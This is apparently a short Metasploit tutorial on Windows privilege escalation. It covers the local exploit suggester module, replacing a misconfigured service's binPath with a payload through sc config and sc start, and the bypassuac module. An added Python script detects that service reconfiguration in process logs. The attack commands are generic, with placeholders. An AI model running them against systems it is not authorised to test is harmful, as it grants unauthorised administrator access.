
19. Metasploit Privilege Escalation

A. Using Exploits

Search for the privilege escalation suggester module from the msfconsole prompt:

search suggester

Run post/multi/recon/local_exploit_suggester against an existing session:

use post/multi/recon/local_exploit_suggester
set SESSION <session-ID>
run

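The module lists local privilege escalation exploits that may apply to the session's target. Each result is a candidate to verify, not a confirmed vulnerability.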

B. Exploiting Misconfigured Services

Check for weak service permissions, starting with the service's configuration (its binary path and the account it runs as):

sc qc <service-name>

Replace the binary path with your payload (this works only when the service's permissions let the current user change its configuration):

sc config <service-name> binPath= "C:\path\to\payload.exe"
sc start <service-name>
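
A detection for the service reconfiguration in section B, as an added example that is not part of the original page: it scans process command-line logs for "sc config ... binPath=" and correlates a following "sc start" of the same service on the same host. The event field names, the trusted directories and the five-minute window are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

SC = r'\bsc(?:\.exe)?"?\s+(?:\\\\\S+\s+)?'   # sc / sc.exe, optional \\host argument
NAME = r'("[^"]+"|\S+)'                       # quoted value or bare token
CONFIG_RE = re.compile(SC + r'config\s+' + NAME + r'\s+.*?\bbinpath=\s*' + NAME, re.I)
START_RE = re.compile(SC + r'start\s+' + NAME, re.I)
# Assumption: legitimate service binaries live under these directories.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
WINDOW = timedelta(minutes=5)                 # assumed correlation window

def detect(events):
    """Alert on every binPath change; mark it if 'sc start' follows within WINDOW."""
    pending, alerts = {}, []                  # pending: (host, service) -> alert
    for ev in sorted(events, key=lambda e: e["time"]):
        m = CONFIG_RE.search(ev["cmdline"])
        if m:
            service, path = m.group(1).strip('"').lower(), m.group(2).strip('"')
            alert = {"host": ev["host"], "user": ev["user"], "service": service,
                     "new_binpath": path, "time": ev["time"],
                     # Heuristic only: a trusted directory does not make a change benign.
                     "untrusted_path": not path.lower().startswith(TRUSTED_DIRS),
                     "started_after": False}
            alerts.append(alert)
            pending[(ev["host"], service)] = alert
            continue
        m = START_RE.search(ev["cmdline"])
        if m:
            alert = pending.get((ev["host"], m.group(1).strip('"').lower()))
            if alert and ev["time"] - alert["time"] <= WINDOW:
                alert["started_after"] = True
    return alerts

# Constructed sample events, modelled on process-creation logs with command lines.
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE = [
    {"time": T0, "host": "ws01", "user": "alice", "cmdline": "sc qc ExampleSvc"},
    {"time": T0 + timedelta(seconds=30), "host": "ws01", "user": "alice",
     "cmdline": 'sc config ExampleSvc binPath= "C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe"'},
    {"time": T0 + timedelta(seconds=40), "host": "ws01", "user": "alice",
     "cmdline": "sc start ExampleSvc"},
    {"time": T0 + timedelta(minutes=1), "host": "srv02", "user": "admin",
     "cmdline": 'sc.exe config Spooler binPath= "C:\\Windows\\System32\\spoolsv.exe"'},
]

if __name__ == "__main__":
    for a in detect(SAMPLE):
        print(a)
```

A service can also be started by other means (for example net start or a reboot), so the started_after flag raises priority but its absence does not clear an alert.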

C. Exploiting UAC

Bypass UAC with:

use exploit/windows/local/bypassuac
set SESSION <session-ID>
run